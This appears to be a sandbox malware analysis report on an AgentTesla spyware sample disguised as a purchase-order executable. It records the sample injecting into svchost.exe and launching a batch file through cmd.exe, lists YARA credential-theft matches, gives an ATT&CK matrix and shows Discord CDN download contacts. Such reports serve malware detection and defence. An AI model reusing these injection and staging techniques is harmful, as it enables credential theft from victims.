                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1000000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1010000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1020000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1030000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1040000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1050000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1060000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1070000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1080000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1090000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1100000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1110000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1120000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1130000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1140000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1150000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1160000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1170000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1180000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1190000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1200000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1210000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1220000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1230000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1240000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1250000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1260000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1270000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1280000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1290000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3310000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3320000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3330000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3340000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3350000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3360000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3370000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3380000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3390000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3400000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3410000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3420000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3430000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3440000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3450000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3460000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3470000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3480000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3490000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3500000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3510000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3520000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3530000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3540000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3550000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3560000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3570000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3580000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 36D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 36E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 36F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3700000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3710000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3720000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3730000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3740000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3750000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3760000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3770000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3780000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3790000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3840000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5110000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5120000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5130000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5140000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5150000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5160000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5170000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5180000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5190000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5230000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5240000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5250000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5260000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5270000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5390000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 53B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess created: C:\Users\user\Desktop\New Order PO20011046.exe C:\Users\user\Desktop\New Order PO20011046.exe
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,GetACP,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_50488A9C GetLocalTime,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_020DBD8A GetUserNameW,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_50485D8D GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    Yara detected AgentTesla
                    Source: Yara match | File source: 0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.919758080.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.921099669.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: New Order PO20011046.exe PID: 1256, type: MEMORY
                    Source: Yara match | File source: 11.2.New Order PO20011046.exe.4a80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.New Order PO20011046.exe.4b40000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.New Order PO20011046.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.New Order PO20011046.exe.4a80000.1.unpack, type: UNPACKEDPE

                    Remote Access Functionality:

                    Yara detected AgentTesla
                    Source: Yara match | File source: 0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.919758080.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.921099669.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: New Order PO20011046.exe PID: 1256, type: MEMORY
                    Source: Yara match | File source: 11.2.New Order PO20011046.exe.4a80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.New Order PO20011046.exe.4b40000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.New Order PO20011046.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.New Order PO20011046.exe.4a80000.1.unpack, type: UNPACKEDPE
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe | Code function: 11_2_00401980 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exe | Code function: 11_2_00401EB6 _memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,CorBindToRuntimeEx,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,InterlockedDecrement,InterlockedDecrement,SysFreeString,VariantClear,InterlockedDecrement,SysFreeString,

                    Mitre Att&ck Matrix

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | Windows Management Instrumentation 211 | Registry Run Keys / Startup Folder 1 | Access Token Manipulation 1 | Disable or Modify Tools 11 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | Scripting 1 | Boot or Logon Initialization Scripts | Process Injection 412 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | Native API 11 | Logon Script (Windows) | Registry Run Keys / Startup Folder 1 | Scripting 1 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | System Information Discovery 126 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 2 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 11 | Cached Domain Credentials | Security Software Discovery 251 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 14 | DCSync | Virtualization/Sandbox Evasion 14 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Process Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 412 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                    Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

                    Behavior Graph

                    Behavior Graph ID: 324078
                    Sample: New Order PO20011046.exe
                    Start date: 28/11/2020
                    Architecture: WINDOWS
                    Score: 100

                    Signatures on the sample: Multi AV Scanner detection for submitted file; Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); 7 other signatures

                    Process tree (started processes, with network contacts, dropped files and signatures attached to each):
                    • New Order PO20011046.exe
                      • discord.com 162.159.128.233, 443, 49731, 49761 CLOUDFLARENETUS United States
                      • cdn.discordapp.com 162.159.135.233, 443, 49732 CLOUDFLARENETUS United States
                      • dropped: C:\Users\user\AppData\Local\...vvudrv.exe, PE32
                      • signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
                      • svchost.exe
                        • cmd.exe
                          • conhost.exe
                        • cmd.exe
                          • conhost.exe
                      • New Order PO20011046.exe
                    • Evvudrv.exe
                      • 162.159.130.233, 443, 49755, 49762 CLOUDFLARENETUS United States
                      • 162.159.136.232, 443, 49754 CLOUDFLARENETUS United States
                      • signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                    • Evvudrv.exe


                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    Source | Detection | Scanner | Label
                    New Order PO20011046.exe | 33% | Virustotal |
                    New Order PO20011046.exe | 69% | ReversingLabs | Win32.Spyware.Woreflint
                    New Order PO20011046.exe | 100% | Joe Sandbox ML |

                    Dropped Files

                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe | 69% | ReversingLabs | Win32.Spyware.Woreflint

                    Unpacked PE Files

                    Source | Detection | Scanner | Label
                    5.2.svchost.exe.50480000.2.unpack | 100% | Avira | HEUR/AGEN.1108767
                    18.2.Evvudrv.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1108767
                    18.2.Evvudrv.exe.2f60000.3.unpack | 100% | Avira | HEUR/AGEN.1108768

                    Domains

                    Source | Detection | Scanner | Label
                    discord.com | 1% | Virustotal |

                    URLs

                    Source | Detection | Scanner | Label
                    http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
                    http://DynDns.comDynDNS | 0% | URL Reputation | safe
                    https://discord.com/ | 0% | URL Reputation | safe
                    http://hltGXE.com | 0% | Avira URL Cloud | safe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
                    https://discord.com/J | 0% | Avira URL Cloud | safe
